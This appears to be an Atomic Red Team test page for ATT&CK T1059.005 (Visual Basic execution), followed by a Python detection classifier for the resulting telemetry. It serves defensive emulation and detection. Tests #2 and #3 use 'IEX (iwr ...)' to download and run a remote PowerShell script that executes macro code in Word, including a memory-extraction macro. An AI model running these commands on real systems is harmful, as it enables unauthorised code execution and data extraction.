# T1059.005 - Command and Scripting Interpreter: Visual Basic

## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking)
## Atomic Tests

- [Atomic Test #1 - Visual Basic script execution to gather local computer information](#atomic-test-1---visual-basic-script-execution-to-gather-local-computer-information)
- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
- [Atomic Test #3 - Extract Memory via VBA](#atomic-test-3---extract-memory-via-vba)
## Atomic Test #1 - Visual Basic script execution to gather local computer information

Visual Basic execution test: runs a VBScript file with cscript, launched from PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt.

**Supported Platforms:** Windows

**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript | Path to sample script | string | PathToAtomicsFolder\T1059.005\src\sys_info.vbs |

#### Attack Commands: Run with `powershell`!

```powershell
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
```

#### Cleanup Commands:

```powershell
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
```

#### Dependencies: Run with `powershell`!

##### Description: Sample script must exist on disk at the specified location (#{vbscript})

##### Check Prereq Commands:

```powershell
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -ItemType Directory (Split-Path "#{vbscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
```

## Atomic Test #2 - Encoded VBS code execution

This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005".

Note: because this module uses the "ScriptControl" object, a 64-bit version of Microsoft Office is required. You can verify the installed version by opening WinWord -> File -> Account -> About Word.

**Supported Platforms:** Windows

**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa

#### Attack Commands: Run with `powershell`!

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```

#### Cleanup Commands:

```powershell
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
```

#### Dependencies: Run with `powershell`!

##### Description: The 64-bit version of Microsoft Office must be installed

##### Check Prereq Commands:

```powershell
try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
```

##### Get Prereq Commands:

```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
```

## Atomic Test #3 - Extract Memory via VBA

This module attempts to emulate malware authors using well-known techniques to extract data from memory or binary files. To do this it first creates a string in memory, then obtains the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored at $env:TEMP\atomic_t1059_005_test_output.bin.

**Supported Platforms:** Windows

**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | string | Word |

#### Attack Commands: Run with `powershell`!

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
```

#### Cleanup Commands:

```powershell
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
```

#### Dependencies: Run with `powershell`!

##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:

```powershell
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
```

##### Get Prereq Commands:

```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
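As an added detection example (not part of the Atomic Red Team page or project), the Python below classifies constructed Sysmon-like process-creation and file-creation events for the behaviours the three tests above generate: cscript handed a .vbs from PowerShell (Test #1), Word spawning mshta (Test #2), and Word writing a .bin into %TEMP% (Test #3). The field names, file paths and alert names are assumptions for the example.

```python
"""Detection logic for the behaviours exercised by the three tests above: a script host running
a .vbs from PowerShell (#1), Word spawning mshta (#2), Word writing a .bin into %TEMP% (#3)."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Event:                  # Sysmon-like fields; events below are constructed samples
    event_type: str           # "process_create" or "file_create"
    parent_image: str         # full path of the parent process
    image: str                # full path of the acting process
    command_line: str = ""
    target_file: str = ""

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()   # lower-cased file name of a Windows path

def classify(ev):
    """Return the alert names raised by one event (empty list if benign)."""
    alerts = []
    parent, image = _base(ev.parent_image), _base(ev.image)
    if ev.event_type == "process_create":
        cmd = ev.command_line.lower()
        # Test #1: cscript/wscript handed a .vbs/.vbe; a second alert when PowerShell is the parent
        if image in {"cscript.exe", "wscript.exe"} and re.search(r"\.vb[se]\b", cmd):
            alerts.append("vbscript_host_execution")
            if parent == "powershell.exe":
                alerts.append("vbscript_spawned_by_powershell")
        # Test #2: an Office process spawning a script host such as mshta
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append("office_spawned_script_host")
    elif ev.event_type == "file_create":
        # Test #3: an Office process writing a .bin under a Temp directory
        target = ev.target_file.lower()
        if image in OFFICE_APPS and "\\temp\\" in target and target.endswith(".bin"):
            alerts.append("office_wrote_binary_to_temp")
    return alerts

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [  # constructed sample telemetry mirroring the three tests plus one benign launch
    Event("process_create", PS, r"C:\Windows\System32\cscript.exe",
          r'cscript "C:\AtomicRedTeam\atomics\T1059.005\src\sys_info.vbs"'),
    Event("process_create", WORD, r"C:\Windows\System32\mshta.exe", "mshta.exe <constructed args>"),
    Event("file_create", WORD, WORD, target_file=r"C:\Users\u\AppData\Local\Temp\atomic_t1059_005_test_output.bin"),
    Event("process_create", r"C:\Windows\explorer.exe", WORD, '"WINWORD.EXE" /n'),
]
```

Running `classify` over `SAMPLE_EVENTS` raises alerts for the first three events and none for the benign Explorer-launched Word process.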